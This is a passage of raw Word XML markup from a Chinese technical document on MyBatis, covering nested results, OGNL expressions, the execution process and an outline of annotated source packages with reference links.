          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，除了兼容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ibatis2.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>嵌套查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方式外，还提供了直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>嵌套结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的方式，其效果相当于直接通过一句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将查询出的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象自动封装成所需的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00723771" w:rsidRDefault="00377723" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MyBatis</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用功能强大的基于</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的表达式来消除其他元素。</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00797951">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>熟悉</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的人应该对</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表达式不会感到陌生，</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MyBatis</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表达式简化了配置文件的复杂性，使用起来更简洁。</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00723771">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8"/>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="005F44A7" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FF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360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其实</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的整个执行过程，理解起来分为如下几个过程：</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>加载配置文件</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解析配置文件，从配置文件中解析出来</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> datasource</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mapper</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件、事务配置等等。将配置信息保存在对象内</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用相关语句，执行</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。在执行的方法中分别完成</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="005F44A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的一系列操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8"/>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﻿mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>源码中文注释版</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>兵马未动，日志先行</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org.apache.ibatis.logging</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lastRenderedPageBreak/>
        <w:t>org.apache.ibatis.logging.commons</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org.apache.ibatis.logging.jdbc</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org.apache.ibatis.logging.jdk14</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org.apache.ibatis.logging.log4j</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org.apache.ibatis.logging.log4j2</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org.apache.ibatis.logging.nologging</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org.apache.ibatis.logging.slf4j</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org.apache.ibatis.logging.stdout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>异常</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org.apache.ibatis.exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>缓存</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org.apache.ibatis.cache</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org.apache.ibatis.cache.decorators</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org.apache.ibatis.cache.impl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>解析</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org.apache.ibatis.parsing</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xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>解析，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">${} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>格式的字符串解析</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源码分析可以参考</w:t>
      </w:r>
      <w:hyperlink r:id="rId230" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="4078C0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/sunzhenchao/p/3161093.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>类型处理器</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org.apache.ibatis.type</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实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>jdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>中的类型之间转换</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源码分析可以参考</w:t>
      </w:r>
      <w:hyperlink r:id="rId231" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="4078C0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>http://www.cnblogs.com/sunzhenchao/archive/2013/04/09/3009431.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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6.IO</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org.apache.ibatis.io</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通过类加载器在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
